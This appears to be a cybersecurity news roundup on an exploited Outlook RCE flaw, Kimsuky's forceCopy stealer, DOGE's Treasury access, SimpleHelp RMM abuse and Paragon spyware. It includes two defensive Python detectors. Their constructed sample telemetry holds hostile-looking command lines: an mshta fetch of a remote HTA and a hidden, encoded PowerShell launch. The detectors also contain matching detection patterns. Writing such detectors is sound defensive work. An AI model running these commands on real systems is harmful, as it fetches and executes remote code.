Outlook RCE bug, Kimsuky forceCopy malware, Treasury tightens DOGE
In today’s cybersecurity news…
Critical RCE bug in Microsoft Outlook now exploited in attacks
CISA is warning U.S. federal agencies to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability. The flaw, which was discovered by researchers at Check Point and carries a CVE identifier, is caused by “improper input validation when opening emails with malicious links using vulnerable Outlook versions.” Attackers can gain remote code execution because “the flaw lets them bypass the Protected View (which should block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.” Yesterday (Thursday) CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, which means federal agencies must patch or otherwise mitigate it by February 27.
Kimsuky uses forceCopy malware to steal browser-stored credentials
According to researchers at South Korea’s AhnLab Security Intelligence Center (ASEC), Kimsuky, the hacking group associated with North Korea, is conducting spear-phishing attacks to deliver an information stealer called forceCopy [sic]. As usual, the chain starts with a phishing email carrying a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. Opening the shortcut launches PowerShell or mshta.exe, a legitimate Microsoft binary that runs HTML Application (HTA) files. That stage deploys a trojan named PEBBLEDASH along with a proxy malware that maintains persistent communications with an external network.
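The delivery chain described above (a shortcut disguised as a document that launches powershell.exe or mshta.exe) is something an endpoint team can hunt for in process-creation telemetry. The detector below is an added example, not code from ASEC or from the malware itself; it runs over constructed Sysmon-style process-creation records embedded in the block, and the indicator names, thresholds and sample command lines are this example’s assumptions, not findings from the report.

```python
"""Flag the LNK-to-LOLBin launch pattern (explorer.exe spawning powershell.exe
or mshta.exe) over constructed process-creation events.  Added example; the
events below are made up and the indicators are generic, not ASEC's."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Binaries the shortcut is reported to launch.
LOLBINS = {"powershell.exe", "mshta.exe"}
# Document extensions a malicious .lnk typically pretends to have (assumed list).
DOC_EXTS = ("doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "hwp")
DOUBLE_EXT = re.compile(r"\.(?:%s)\.lnk\b" % "|".join(DOC_EXTS), re.I)
REMOTE_URL = re.compile(r"https?://\S+", re.I)
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of indicators that match one event (empty if none)."""
    img = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    reasons: list[str] = []
    if img not in LOLBINS:
        return reasons
    if parent == "explorer.exe":
        # A double-clicked shortcut is launched directly by explorer.exe; so is a
        # user opening PowerShell from the Start menu, hence this alone is weak.
        reasons.append(f"{img} launched by explorer.exe")
    if DOUBLE_EXT.search(ev.command_line):
        # Some shortcut payloads read their own .lnk to carve an embedded stage
        # (assumption about the technique, not a claim from the report).
        reasons.append("command line references a double-extension .lnk")
    if img == "mshta.exe" and REMOTE_URL.search(ev.command_line):
        reasons.append("mshta.exe fetching a remote HTA")
    if img == "powershell.exe" and ENCODED_PS.search(ev.command_line):
        reasons.append("powershell.exe with an encoded command")
    return reasons


def detect(events: list[ProcEvent], min_indicators: int = 2) -> list[tuple[int, list[str]]]:
    """Alert on events matching at least min_indicators independent signals."""
    alerts = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_indicators:
            alerts.append((i, reasons))
    return alerts


# CONSTRUCTED sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.7/update.hta"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -w hidden -enc SQBFAFgA"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),                         # user opened a console
    ProcEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),  # not a LOLBIN here
]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line, why)
```

The two-indicator threshold is the important design choice: explorer.exe spawning PowerShell is everyday behaviour, so the rule only alerts when that parentage coincides with a remote HTA fetch, an encoded command, or a double-extension shortcut in the command line.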
Treasury agrees to block additional DOGE staff from accessing sensitive payment systems
Following up on a story we covered on Wednesday, the Treasury Department has now agreed to temporarily block all but two members of the Trump administration’s Department of Government Efficiency (DOGE) team from accessing sensitive payment records and to limit their access to “read-only,” according to a Wednesday court filing. This follows a lawsuit that union groups filed against Treasury Secretary Scott Bessent on Monday. The two members still allowed access are Tom Krause, who is the CEO of a company that owns Citrix and other technology firms, and his employee Marko Elez. Some news outlets have reported that “DOGE has full access to the Treasury payment systems and has the ability to write code controlling most payments made by the federal government.”
Huge thanks to our sponsor, ThreatLocker
British engineering company IMI reports cyber incident
This is the second U.K.-based engineering giant to report a cyber incident to the London Stock Exchange (LSE) in the last nine days. Representatives of the company, which specializes in industrial automation and climate control products, describe the incident as involving “unauthorized access to the company’s systems,” but have declined to elaborate.
SimpleHelp RMM flaws exploited to deploy Sliver malware
SimpleHelp, remote monitoring and management (RMM) software used by many tech support professionals to access and fix customers’ computers, is being abused through three flaws, each with a CVE identifier, which attackers are using to “create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.” Exploitation in the wild was confirmed by cybersecurity firm Field Effect. The attack involves “exploiting the vulnerabilities in the SimpleHelp RMM client to establish an unauthorized connection to a target endpoint.” In the case Field Effect observed, the connection came from an Estonian-based server running a SimpleHelp instance on port 80. SimpleHelp users are advised to apply the most recent security updates that address the flaws, to look for administrator accounts named ‘sqladmin’ and ‘fpmhlttech,’ and to check for connections to the IPs listed in Field Effect’s report, which is linked in the show notes to this episode.
(BleepingComputer and Field Effect)
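The three hunts the item recommends (rogue administrator accounts, connections to the report’s IPs, and SimpleHelp client traffic to a remote port 80 server) can be run from exported host data. The triage helper below is an added example, not code from Field Effect or BleepingComputer. It works over constructed `net localgroup`-style member lists and `netstat -ano`-style output embedded in the block; the IOC IP list is a placeholder in the documentation range to be replaced with the report’s addresses, and the SimpleHelp client image names are assumptions.

```python
"""Triage helper for the SimpleHelp RMM abuse described above.  Added example.
Checks: administrator accounts named in the report, connections to analyst-
supplied IOC IPs, and SimpleHelp client connections to remote port 80."""
from __future__ import annotations
import re

ROGUE_ADMINS = {"sqladmin", "fpmhlttech"}        # account names given in the report
IOC_IPS = {"203.0.113.45"}                         # CONSTRUCTED placeholder; use the report's list
SIMPLEHELP_IMAGES = {"remote access.exe", "simplehelp.exe"}  # ASSUMED client image names

# "  TCP    10.0.0.5:49812     203.0.113.45:80      ESTABLISHED     4120"
NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_netstat(text: str) -> list[dict]:
    """Parse TCP rows of `netstat -ano` output into dicts (other rows ignored)."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            conns.append({"laddr": m[1], "lport": int(m[2]), "raddr": m[3],
                          "rport": int(m[4]), "state": m[5], "pid": int(m[6])})
    return conns


def find_rogue_admins(members: list[str]) -> list[str]:
    """Members of the local Administrators group whose names match the report."""
    return sorted(m for m in members if m.lower() in ROGUE_ADMINS)


def find_suspicious_conns(conns: list[dict], pid_to_image: dict[int, str]) -> list[tuple]:
    """(remote ip, remote port, owning image, reason) for each connection of interest."""
    hits = []
    for c in conns:
        if c["state"] != "ESTABLISHED":
            continue
        image = pid_to_image.get(c["pid"], "").lower()
        if c["raddr"] in IOC_IPS:
            hits.append((c["raddr"], c["rport"], image, "remote address in IOC list"))
        elif image in SIMPLEHELP_IMAGES and c["rport"] == 80:
            # A lead, not proof: compare against your own SimpleHelp server address.
            hits.append((c["raddr"], c["rport"], image, "SimpleHelp client to remote port 80"))
    return hits


# CONSTRUCTED sample host data (198.51.100.0/24 and 203.0.113.0/24 are documentation ranges).
ADMIN_MEMBERS = ["Administrator", "sqladmin", "jdoe"]
PID_TO_IMAGE = {4120: "Remote Access.exe", 812: "chrome.exe", 2200: "svchost.exe"}
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49812         203.0.113.45:80        ESTABLISHED     4120
  TCP    10.0.0.5:49820         198.51.100.9:443       ESTABLISHED     812
  TCP    10.0.0.5:49833         198.51.100.20:80       ESTABLISHED     4120
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       2200
"""

if __name__ == "__main__":
    print("rogue admins:", find_rogue_admins(ADMIN_MEMBERS))
    for hit in find_suspicious_conns(parse_netstat(NETSTAT_SAMPLE), PID_TO_IMAGE):
        print("connection:", hit)
```

On a live host the inputs come from `net localgroup Administrators`, `netstat -ano`, and `tasklist` (to map PIDs to images); the port-80 match will also fire for a legitimately configured SimpleHelp server that listens on 80, so treat it as a prompt to verify the remote address rather than as an indicator of compromise on its own.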
Paragon ends contract with Italy over spyware scandal
Following up on a story we covered earlier this week, the maker of the infamous Paragon zero-click spyware has allegedly ended its relationship with Italy, following revelations that “an Italian investigative journalist and two activists who were critical of Italy’s dealings with Libya were among the people who had allegedly been targeted with the spyware.” All three individuals are on the record as critics of the right-wing government of Italy’s prime minister, Giorgia Meloni. Paragon alleges that the Italian government had “breached the terms of Paragon’s contract with the government, which does not allow for journalists or members of civil society to be targeted with the spyware.”
Reboot your phone to avoid spyware, says security expert
Rocky Cole, co-founder of mobile threat protection company iVerify, said in an interview with ZDNet that the best way for people to avoid being infected by zero-click spyware like Paragon is to reboot their phones regularly, the way they would, or should, with their computers. “This is because many of these exploits exist in memory only, as opposed to being files,” he said. That is a default behavior. He also recommends using an internal scanning app to find malicious files on the phone, as well as using Lockdown Mode on Apple devices. He adds that because it is the phone’s underlying vulnerabilities that are exploited, something that only Apple, Google, and their app developers can fix, it is critically important for end users to apply new security patches as soon as possible.
(ZDNet)